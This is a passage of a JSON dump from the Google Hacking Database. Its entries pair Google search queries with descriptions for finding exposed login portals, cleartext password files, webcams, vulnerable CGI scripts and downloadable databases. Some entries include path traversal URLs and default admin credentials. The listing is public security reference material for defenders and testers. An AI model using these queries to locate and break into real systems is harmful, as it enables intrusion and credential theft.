        "shortDescription": "inurl:click.php intext:PHPClickLog", 
        "textualDescription": "A script written in PHP 4 which logs a user's statistics when they click on a link.  The log is stored in a flatfile (text) database and can be viewed/inspected through an administration section."
    }, 
    {
        "signatureReferenceNumber": "630", 
        "link": "https://www.exploit-db.com/ghdb/630/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=intitle:welcome.to.horde&hl=en&lr=&filter=0", 
        "shortDescription": "intitle:welcome.to.horde", 
        "textualDescription": "Horde Mail is web based email software, great for checking messages on the road. Several vulnerabilities were reported to Security Focus."
    }, 
    {
        "signatureReferenceNumber": "631", 
        "link": "https://www.exploit-db.com/ghdb/631/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=%22BlackBoard+1.5.1-f+%7C+%C2%A9+2003-4+by+Yves+Goergen%22&hl=en&lr=&filter=0", 
        "shortDescription": "\"BlackBoard 1.5.1-f | \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 2003-4 by Yves Goergen\"", 
        "textualDescription": "bugtraq id 11336objectclass Input Validation Errorcve CVE-MAP-NOMATCHremote Yeslocal Nopublished Oct 06, 2004updated Oct 06, 2004vulnerable BlackBoard Internet Newsboard System BlackBoard Internet Newsboard System 1.5.1BlackBoard Internet Newsboard System is reported prone to a remote file include vulnerability. This issue presents itself because the application fails to sanitize user-supplied data properly. This issue may allow an attacker to include malicious files containing arbitrary script code to be executed on a vulnerable computer.BlackBoard Internet Newsboard System version 1.5.1 is reported prone to this vulnerability. It is possible that prior versions are affected as well."
    }, 
    {
        "signatureReferenceNumber": "632", 
        "link": "https://www.exploit-db.com/ghdb/632/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22AppServ+Open+Project%22+-site%3Awww.appservnetwork.com&btnG=Search", 
        "shortDescription": "intitle:\"AppServ Open Project\" -site:www.appservnetwork.com", 
        "textualDescription": "AppServ is the Apache/PHP/MySQL open source software installer packages. This normally includes convenient links to phpMyAdmin and phpInfo() pages."
    }, 
    {
        "signatureReferenceNumber": "633", 
        "link": "https://www.exploit-db.com/ghdb/633/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.de/search?q=%22powered+by+YellDL%22", 
        "shortDescription": "\"powered by YellDL\"", 
        "textualDescription": "Finds websites using YellDL (or also known as YellDownLoad), a download tracker written in PHP. Unfortunately this downloader downloads everything you want to, like its own files too:http://xxxxxxxxxx/download.php?f=../download&e=phpBy guessing some could download information which shoudln't get out of the server (think of ../phpMyAdmin/config.php or other stuff - no need to say that lazy people use same passwords for their DB- and FTP-login.Another search to find this software is:\"You are downloading *\" \"you are downloader number * of this file\""
    }, 
    {
        "signatureReferenceNumber": "634", 
        "link": "https://www.exploit-db.com/ghdb/634/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&q=intitle%3A%22index+of%22+intext%3A%22content%2Eie5%22", 
        "shortDescription": "intitle:\"index of\" intext:\"content.ie5\"", 
        "textualDescription": "This dork indicates the \"Local settings\" dir in most cases, and browseble server directories in general."
    }, 
    {
        "signatureReferenceNumber": "635", 
        "link": "https://www.exploit-db.com/ghdb/635/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net", 
        "shortDescription": "intitle:\"php icalendar administration\" -site:sourceforge.net", 
        "textualDescription": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.This reveals the administration interface."
    }, 
    {
        "signatureReferenceNumber": "636", 
        "link": "https://www.exploit-db.com/ghdb/636/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22Web+Server+Statistics+for+****%22&btnG=Search", 
        "shortDescription": "intitle:\"Web Server Statistics for ****\"", 
        "textualDescription": "These are www analog webstat reports. The failure report shows information leakage about database drivers, admin login pages,  SQL statements, etc."
    }, 
    {
        "signatureReferenceNumber": "637", 
        "link": "https://www.exploit-db.com/ghdb/637/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&&q=filetype%3Aphp+inurl%3Aindex+inurl%3Aphpicalendar+-site%3Asourceforge.net", 
        "shortDescription": "filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net", 
        "textualDescription": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigationThis reveals the RSS info for the user calendars."
    }, 
    {
        "signatureReferenceNumber": "638", 
        "link": "https://www.exploit-db.com/ghdb/638/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=intitle%3A%22php+icalendar+administration%22+-site%3Asourceforge.net", 
        "shortDescription": "intitle:\"php icalendar administration\" -site:sourceforge.net", 
        "textualDescription": "This is the adminstration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin uuthentication has two choices, FTP and Internal. For the latter the defaults are \"admin/admin\".There is also a more generic search in the GHDB that an attacker use and then modify to ../admin.php to reach the adminstration pages. Access to adminstration allows an attacker to upload new ICS files or delete present ones."
    }, 
    {
        "signatureReferenceNumber": "639", 
        "link": "https://www.exploit-db.com/ghdb/639/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?q=intitle%3AphpMyAdmin+%22Welcome+to+phpMyAdmin+***%22+%22running+on+*+as+root%40*%22&start=0", 
        "shortDescription": "intitle:phpMyAdmin \"Welcome to phpMyAdmin ***\" \"running on * as root@*\"", 
        "textualDescription": "phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fieldsThe servers found here can be acessed without authentication. This search is restricted to NON-ROOT users! See ID 510 for a root user search."
    }, 
    {
        "signatureReferenceNumber": "640", 
        "link": "https://www.exploit-db.com/ghdb/640/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.nl/search?q=%22please+visit%22+intitle:%22i-Catcher+Console%22+Copyright+%22iCode+Systems%22&num=100&hl=nl&lr=&filter=0", 
        "shortDescription": "\"please visit\" intitle:\"i-Catcher Console\" Copyright \"iCode Systems\"", 
        "textualDescription": "CCTV webcams by ICode."
    }, 
    {
        "signatureReferenceNumber": "641", 
        "link": "https://www.exploit-db.com/ghdb/641/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&q=inurl%3Airc+filetype%3Acgi+cgi%3Airc", 
        "shortDescription": "inurl:irc filetype:cgi cgi:irc", 
        "textualDescription": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else."
    }, 
    {
        "signatureReferenceNumber": "642", 
        "link": "https://www.exploit-db.com/ghdb/642/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=natterchat+inurl%3Ahome.asp+-site%3Anatterchat.co.uk+&btnG=Search", 
        "shortDescription": "natterchat inurl:home.asp -site:natterchat.co.uk", 
        "textualDescription": "NatterChat is a webbased chat system written in ASP.An SQL injection vulnerability is identified in the application that may allow attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks. This allows the attacker to gain admin access..."
    }, 
    {
        "signatureReferenceNumber": "643", 
        "link": "https://www.exploit-db.com/ghdb/643/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=filetype%3Ainf+inurl%3Acapolicy.inf&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox&rls=org.mozilla:en-US:official", 
        "shortDescription": "filetype:inf inurl:capolicy.inf", 
        "textualDescription": "The CAPolicy.inf file provides Certificate Servicces configuration information, which is read during initial CA installation an whenever you renew a CA certificate. The CApolicy.inf file defines settings specific to root CAs, as well as settings that affect all CAs in the CA hierarchiy."
    }, 
    {
        "signatureReferenceNumber": "644", 
        "link": "https://www.exploit-db.com/ghdb/644/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&safe=off&q=%22Certificate+Practice+Statement%22+inurl%3A%28PDF+%7C+DOC%29&btnG=Search", 
        "shortDescription": "\"Certificate Practice Statement\" inurl:(PDF | DOC)", 
        "textualDescription": "Certificate Practice Statement  (CPS)A CPS defines the measures taken to secure CA operation and the management of CA-issued certificates. You can consider a CPS to be an agreement between the organization managing the CA and the people relying on on the certificates issued by the CA."
    }, 
    {
        "signatureReferenceNumber": "645", 
        "link": "https://www.exploit-db.com/ghdb/645/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=en&q=filetype%3Acgi+inurl%3Acachemgr.cgi", 
        "shortDescription": "filetype:cgi inurl:cachemgr.cgi", 
        "textualDescription": "cachemgr.cgi is a management interface for the Squid proxy service. It was installed by default in /cgi-bin by RedHat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port which it then attempts to connect to. If a web server, such as apache, is running this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial of service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established."
    }, 
    {
        "signatureReferenceNumber": "646", 
        "link": "https://www.exploit-db.com/ghdb/646/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&q=inurl%3Achap-secrets+-cvs+&btnG=Suche&meta=", 
        "shortDescription": "inurl:chap-secrets -cvs", 
        "textualDescription": "linux vpns store their usernames and passwords for CHAP authentification in a file called \"chap-secrets\" where the usernames and the passwords are in cleartext."
    }, 
    {
        "signatureReferenceNumber": "647", 
        "link": "https://www.exploit-db.com/ghdb/647/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Apap-secrets+-cvs+&btnG=Search", 
        "shortDescription": "inurl:pap-secrets -cvs", 
        "textualDescription": "linux vpns store there usernames and passwords for PAP authentification in a file called \"pap-secrets\" where the usernames and the passwords are in cleartext."
    }, 
    {
        "signatureReferenceNumber": "648", 
        "link": "https://www.exploit-db.com/ghdb/648/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?&q=filetype%3Aini+inurl%3A%22serv-u.ini%22", 
        "shortDescription": "filetype:ini inurl:\"serv-u.ini\"", 
        "textualDescription": "serv-U is a ftp/administration server for Windows. This file leaks info about the version, username and password. Passwords are in encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc."
    }, 
    {
        "signatureReferenceNumber": "649", 
        "link": "https://www.exploit-db.com/ghdb/649/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=inurl:%22forumdisplay.php%22+%2B%22Powered+by:+vBulletin+Version+3.0.0..4%22+&hl=en&lr=&c2coff=1&client=firefox-a&rls=org.mozilla:en-US:official&start=80&sa=N", 
        "shortDescription": "inurl:\"forumdisplay.php\" +\"Powered by: vBulletin Version 3.0.0..4\"", 
        "textualDescription": "vBulletin is reported vulnerable to a remote SQL injection vulnerability. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. An attacker may exploit this issue to manipulate and inject SQL queries onto the underlying database. It will be possible to leverage this issue to steal database contents including administrator password hashes and user credentials as well as to make attacks against the underlying database. Versions 3.0 through to 3.0.3 are reportedly affected by this issue.http://www.securityfocus.com/bid/11193"
    }, 
    {
        "signatureReferenceNumber": "650", 
        "link": "https://www.exploit-db.com/ghdb/650/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=WebControl+intitle%3A%22AMX+NetLinx%22&btnG=Search&hl=en&lr=&c2coff=1&client=firefox", 
        "shortDescription": "WebControl intitle:\"AMX NetLinx\"", 
        "textualDescription": "AMX Netlink is a server appliance which connects various devices like a beamer, laptop or video recorder to the internet."
    }, 
    {
        "signatureReferenceNumber": "651", 
        "link": "https://www.exploit-db.com/ghdb/651/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?q=inurl%3AConnectComputer%2Fprecheck.htm+%7C+inurl%3ARemote%2Flogon.aspx", 
        "shortDescription": "inurl:ConnectComputer/precheck.htm | inurl:Remote/logon.aspx", 
        "textualDescription": "Windows Small Business Server 2003: The network configuration page is called \"ConnectComputer/precheck.htm \" and the Remote Web login page is called \"remote/logon.aspx\"."
    }, 
    {
        "signatureReferenceNumber": "652", 
        "link": "https://www.exploit-db.com/ghdb/652/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Aaol*%2F_do%2Frss_popup%3FblogID%3D&btnG=Search", 
        "shortDescription": "inurl:aol*/_do/rss_popup?blogID=", 
        "textualDescription": "AOL Journals BlogID Incrementing Discloses Account Names and Email AddressesAOL Journals is basically \"America Online's version of a blog (weblog) for AOL members/subscribers. A vulnerability in AOL Journals BlogID allows an attacker to numbers provided to the program and enumerate a list of AOL members/subscribers and their corresponding email."
    }, 
    {
        "signatureReferenceNumber": "653", 
        "link": "https://www.exploit-db.com/ghdb/653/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%28inurl%3A%2Fshop.cgi%2Fpage%3D%29+%7C+%28inurl%3A%2Fshop.pl%2Fpage%3D%29&btnG=Search", 
        "shortDescription": "(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)", 
        "textualDescription": "This is a \"double dork\" finds two different shopping carts, both vulnerable1) Cyber-Village Online Consulting Shopping CartCyber-Village's script is known to not sanitize the user input properly which leads to code execution problems.2) Hassan Consulting's Shopping CartFor Hassan's cart it is reported that a remote user can request the 'shop.cfg' and that the script allows directory traversal."
    }, 
    {
        "signatureReferenceNumber": "654", 
        "link": "https://www.exploit-db.com/ghdb/654/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?q=inurl:newsdesk.cgi%3F+inurl:%22t%3D%22&hl=en&lr=&ie=UTF-8&c2coff=1&client=firefox-a&start=10&sa=N", 
        "shortDescription": "inurl:newsdesk.cgi? inurl:\"t=\"", 
        "textualDescription": "Newsdesk is a cgi script designed to allow remote administration of website news headlines.Due to a failure in the sanitization of parameters a remote user can reveal the contents of any file. This allows the attacker to download user and password data.It is furthermore known that it is possible to run system commands remotely."
    }, 
    {
        "signatureReferenceNumber": "655", 
        "link": "https://www.exploit-db.com/ghdb/655/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=%22Switch+to+table+format%22+inurl%3Atable%7Cplain&btnG=Search", 
        "shortDescription": "\"Switch to table format\" inurl:table|plain", 
        "textualDescription": "This is an index page of OReilly WebSite Professional.WebsitePro was developed by O'reily and disconinued on August 2001. The product was then continued by Deerfield.com"
    }, 
    {
        "signatureReferenceNumber": "656", 
        "link": "https://www.exploit-db.com/ghdb/656/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22Home%22+%22Xerox+Corporation%22+%22Refresh+Status%22&btnG=Search", 
        "shortDescription": "intitle:\"Home\" \"Xerox Corporation\" \"Refresh Status\"", 
        "textualDescription": "CentreWare Internet Services is an interactive service that uses Internet technology to extend the capabilities of your DocuPrint printer using Internet technology. An HTTP server application developed by Xerox is resident on your network-enabled DocuPrint printer. This HTTP server provides access to advanced services for the installation, configuration, and management of your DocuPrint printer."
    }, 
    {
        "signatureReferenceNumber": "657", 
        "link": "https://www.exploit-db.com/ghdb/657/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=inurl%3Awebutil.pl&btnG=Search", 
        "shortDescription": "inurl:webutil.pl", 
        "textualDescription": "webutil.pl is a web interface to the following services:* ping* traceroute* whois* finger* nslookup* host* dnsquery* dig* calendar* uptime"
    }, 
    {
        "signatureReferenceNumber": "658", 
        "link": "https://www.exploit-db.com/ghdb/658/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=%22About+Mac+OS+Personal+Web+Sharing%22&hl=en&lr=&c2coff=1&client=firefox-a&filter=0", 
        "shortDescription": "\"About Mac OS Personal Web Sharing\"", 
        "textualDescription": "Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.If you open this page you will shown the system's major version as requirement."
    }, 
    {
        "signatureReferenceNumber": "659", 
        "link": "https://www.exploit-db.com/ghdb/659/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=ext:conf+NoCatAuth+-cvs&hl=en&lr=&filter=0", 
        "shortDescription": "ext:conf NoCatAuth -cvs", 
        "textualDescription": "NoCatAuth configuration file. This reveals the configuration details of wirless gateway including ip addresses, device names and pathes."
    }, 
    {
        "signatureReferenceNumber": "660", 
        "link": "https://www.exploit-db.com/ghdb/660/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=inurl%3A%22putty.reg%22&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", 
        "shortDescription": "inurl:\"putty.reg\"", 
        "textualDescription": "This registry dump contains putty saved session data. SSH servers the according usernames and proxy configurations are stored here."
    }, 
    {
        "signatureReferenceNumber": "661", 
        "link": "https://www.exploit-db.com/ghdb/661/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&client=firefox-a&q=intitle%3A%22Icecast+Administration+Admin+Page%22&btnG=Search", 
        "shortDescription": "intitle:\"Icecast Administration Admin Page\"", 
        "textualDescription": "Icecast streaming audio server web admin.This gives you a list of connected clients. Interesting way of finding attackable client computers."
    }, 
    {
        "signatureReferenceNumber": "662", 
        "link": "https://www.exploit-db.com/ghdb/662/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=inurl%3A%2Fadm-cfgedit.php+&start=0&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:en-US:official", 
        "shortDescription": "inurl:/adm-cfgedit.php", 
        "textualDescription": "PhotoPost Pro is photo gallery system. This dork finds its installation page.You can use this page to set all parameters of the system. The existing data is not shown :("
    }, 
    {
        "signatureReferenceNumber": "663", 
        "link": "https://www.exploit-db.com/ghdb/663/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?q=%22liveice+configuration+file%22+ext:cfg+-site:sourceforge.net&hl=en&lr=&c2coff=1&filter=0", 
        "shortDescription": "\"liveice configuration file\" ext:cfg -site:sourceforge.net", 
        "textualDescription": "This finds the liveice.cfg file  which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file."
    }, 
    {
        "signatureReferenceNumber": "664", 
        "link": "https://www.exploit-db.com/ghdb/664/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?q=inurl:portscan.php+%22from+Port%22%7C%22Port+Range%22&num=100&hl=en&lr=&ie=UTF-8&c2coff=1&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", 
        "shortDescription": "inurl:portscan.php \"from Port\"|\"Port Range\"", 
        "textualDescription": "This is general search for online port scanners which accept any IP. It does not find a specific scanner script, but searches for a pattern which will match some more scanners."
    }, 
    {
        "signatureReferenceNumber": "665", 
        "link": "https://www.exploit-db.com/ghdb/665/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&safe=off&c2coff=1&q=++intitle%3A%22sysinfo+*+%22+intext%3A%22Generated+by+Sysinfo+*+written+by+The+Gamblers.%22+&btnG=Search", 
        "shortDescription": "intitle:\"sysinfo * \" intext:\"Generated by Sysinfo * written by The Gamblers.\"", 
        "textualDescription": "Lots of information leakage on these pages about active network services, server info, network connections, etc.."
    }, 
    {
        "signatureReferenceNumber": "666", 
        "link": "https://www.exploit-db.com/ghdb/666/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&q=filetype%3Apst+pst+-from+-to+-date&btnG=Search", 
        "shortDescription": "filetype:pst pst -from -to -date", 
        "textualDescription": "Finds Outlook PST files which can contain emails, calendaring and address information."
    }, 
    {
        "signatureReferenceNumber": "667", 
        "link": "https://www.exploit-db.com/ghdb/667/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?hl=en&q=intitle%3AConfiguration.File+inurl%3Asoftcart.exe&btnG=Google+Search", 
        "shortDescription": "intitle:Configuration.File inurl:softcart.exe", 
        "textualDescription": "This search finds configuration file errors within the softcart application. It includes the name of the configuration file and discloses server file paths."
    }, 
    {
        "signatureReferenceNumber": "668", 
        "link": "https://www.exploit-db.com/ghdb/668/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Atechnote+inurl%3Amain.cgi*filename%3D*+&btnG=Google+Search", 
        "shortDescription": "inurl:technote inurl:main.cgi*filename=*", 
        "textualDescription": "http://www.securityfocus.com/bid/2156/discussion/ Remote command execution vulnerability in the filename parameter."
    }, 
    {
        "signatureReferenceNumber": "669", 
        "link": "https://www.exploit-db.com/ghdb/669/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intext:%22Ready+with+10/100T+Ethernet%22&hl=en&lr=&c2coff=1&filter=0", 
        "shortDescription": "intext:\"Ready with 10/100T Ethernet\"", 
        "textualDescription": "Xerox 860 and 8200 Printers."
    }, 
    {
        "signatureReferenceNumber": "670", 
        "link": "https://www.exploit-db.com/ghdb/670/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?q=intext%3A%22UAA+%28MSB%29%22++Lexmark+-ext%3Apdf", 
        "shortDescription": "intext:\"UAA (MSB)\"  Lexmark -ext:pdf", 
        "textualDescription": "Lexmark printers (T620, T522, Optra T614, E323, T622, Optra T610, Optra T616, T520 and Optra S 1855)"
    }, 
    {
        "signatureReferenceNumber": "671", 
        "link": "https://www.exploit-db.com/ghdb/671/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?num=100&q=intitle%3A%22Welcome+to+Your+New+Home+Page%21%22+%22by+the+Debian+release%22", 
        "shortDescription": "intitle:\"Welcome to Your New Home Page!\" \"by the Debian release\"", 
        "textualDescription": "This finds the default Apache page on Debian installs."
    }, 
    {
        "signatureReferenceNumber": "672", 
        "link": "https://www.exploit-db.com/ghdb/672/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=%22intitle%3AIndex.Of+%2F%22+stats+merchant+cgi-*+etc", 
        "shortDescription": "\"intitle:Index.Of /\" stats merchant cgi-* etc", 
        "textualDescription": "This search looks for indexes with the following subdirectories: stats, merchant, online-store and cgi-local or cgi-bin. These servers have a shopping cart application called softcart in their cgi-local or cgi-bin directory. Reportedly, it is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b."
    }, 
    {
        "signatureReferenceNumber": "673", 
        "link": "https://www.exploit-db.com/ghdb/673/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=%22running%3A+Nucleus+v3.1%22+-.nucleuscms.org+-demo", 
        "shortDescription": "\"running: Nucleus v3.1\" -.nucleuscms.org -demo", 
        "textualDescription": "Multiple unspecified vulnerabilities reportedly affect Nucleus CMS. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. http://www.securityfocus.com/bid/11631"
    }, 
    {
        "signatureReferenceNumber": "674", 
        "link": "https://www.exploit-db.com/ghdb/674/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22intitle%3ACisco+Systems%2C+Inc.+VPN+3000+Concentrator%22&btnG=Search", 
        "shortDescription": "\"intitle:Cisco Systems, Inc. VPN 3000 Concentrator\"", 
        "textualDescription": "The Cisco VPN 3000 Concentrator is a remote access VPN. The 'Concentrator'  is a piece of hardware that manages a companies VPN's. This google dork searches for the Concentrators login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator."
    }, 
    {
        "signatureReferenceNumber": "675", 
        "link": "https://www.exploit-db.com/ghdb/675/", 
        "category": "Advisories and Vulnerabilities", 
        "querystring": "http://www.google.com/search?q=%22driven+by%3A+ASP+Message+Board%22", 
        "shortDescription": "\"driven by: ASP Message Board\"", 
        "textualDescription": "Multiple unspecified vulnerabilities reportedly affect the Infusium ASP Message Board. A remote attacker may leverage these issues to steal cookie-based authentication credentials, reveal sensitive data and corrupt database contents. vulnerable Infuseum ASP Message Board 2.2.1 cAdding the 2.2.1c seems to filter out some good positives, so I left it out."
    }, 
    {
        "signatureReferenceNumber": "676", 
        "link": "https://www.exploit-db.com/ghdb/676/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&hl=en&safe=off&q=ext%3Aasp+inurl%3ADUgallery+intitle%3A%223.0%22+-site%3Adugallery.com+-site%3Aduware.com&btnG=Search", 
        "shortDescription": "ext:asp inurl:DUgallery intitle:\"3.0\" -site:dugallery.com -site:duware.com", 
        "textualDescription": "The MS access database can be downloaded from inside the docroot. The user table holds the admin password in plain text. Possible locations for the dugallery database are:http://xx/.../DUgallery/database/dugallery.mdbhttp://xx/.../DUgallery//_private/DUgallery.mdbhttp://www.securitytracker.com/alerts/2004/Nov/1012201.html"
    }, 
    {
        "signatureReferenceNumber": "677", 
        "link": "https://www.exploit-db.com/ghdb/677/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?hl=en&q=ext%3Aasp+%22powered+by+DUForum%22+inurl%3A%28messages%7Cdetails%7Clogin%7Cdefault%7Cregister%29+-site%3Aduware.com", 
        "shortDescription": "ext:asp \"powered by DUForum\" inurl:(messages|details|login|default|register) -site:duware.com", 
        "textualDescription": "DUForum is one of those free forum software packages. The database location is determined by the config file \"connDUforumAdmin.asp\", but the installation instructions don't recommend changing it. Ouch..Database location is: http://server/duforum/_private/DUforum.mdb"
    }, 
    {
        "signatureReferenceNumber": "678", 
        "link": "https://www.exploit-db.com/ghdb/678/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22enable+secret+5+%24%22", 
        "shortDescription": "intext:\"enable secret 5 $\"", 
        "textualDescription": "sometimes people make mistakes and post their cisco configs on \"help sites\" and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string."
    }, 
    {
        "signatureReferenceNumber": "679", 
        "link": "https://www.exploit-db.com/ghdb/679/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&q=inurl%3Apostfixadmin+intitle%3A%22postfix+admin%22+ext%3Aphp", 
        "shortDescription": "inurl:postfixadmin intitle:\"postfix admin\" ext:php", 
        "textualDescription": "Postfix Admin login pages. Duh."
    }, 
    {
        "signatureReferenceNumber": "680", 
        "link": "https://www.exploit-db.com/ghdb/680/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?q=ext%3Acgi+inurl%3Aeditcgi.cgi+inurl%3Afile%3D", 
        "shortDescription": "ext:cgi inurl:editcgi.cgi inurl:file=", 
        "textualDescription": "This was inspired by the K-Otic report. Only two results at time of writing. The cgi script lets you view any file on the system, including /etc/.. (guess it ;)http://www.k-otik.com/exploits/08242004.Axis.sh.php"
    }, 
    {
        "signatureReferenceNumber": "681", 
        "link": "https://www.exploit-db.com/ghdb/681/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3Aaxis-cgi", 
        "shortDescription": "inurl:axis-cgi", 
        "textualDescription": "Just another search string to detect the infamous Axis netcams. This company actually changed the generic /cgi-bin/ directory name to /axis-cgi/, making it easier to d0rk them ;)"
    }, 
    {
        "signatureReferenceNumber": "682", 
        "link": "https://www.exploit-db.com/ghdb/682/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&q=filetype%3Ans1+ns1", 
        "shortDescription": "filetype:ns1 ns1", 
        "textualDescription": "Netstunbler files contain information about the wireless network. For a cleanup add stuff like: +\"Creator\" +\"Format\" +\"DateGMT\"."
    }, 
    {
        "signatureReferenceNumber": "683", 
        "link": "https://www.exploit-db.com/ghdb/683/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Starting+SiteZAP+6.0%22", 
        "shortDescription": "\"Starting SiteZAP 6.0\"", 
        "textualDescription": "siteZap webcams !"
    }, 
    {
        "signatureReferenceNumber": "684", 
        "link": "https://www.exploit-db.com/ghdb/684/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?q=intitle:%22phpPgAdmin+-+Login%22+Language&hl=en&lr=&c2coff=1&start=10&sa=N", 
        "shortDescription": "intitle:\"phpPgAdmin - Login\" Language", 
        "textualDescription": "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services"
    }, 
    {
        "signatureReferenceNumber": "685", 
        "link": "https://www.exploit-db.com/ghdb/685/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&q=filetype%3Aconfig+web.config+-CVS", 
        "shortDescription": "filetype:config web.config -CVS", 
        "textualDescription": "Through Web.config an IIS adminstrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site. This file can hold a plaintext password in the worst case or just reveil the full path info on a 404 error."
    }, 
    {
        "signatureReferenceNumber": "686", 
        "link": "https://www.exploit-db.com/ghdb/686/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&c2coff=1&q=++filetype%3Amyd+myd+-CVS&btnG=Search", 
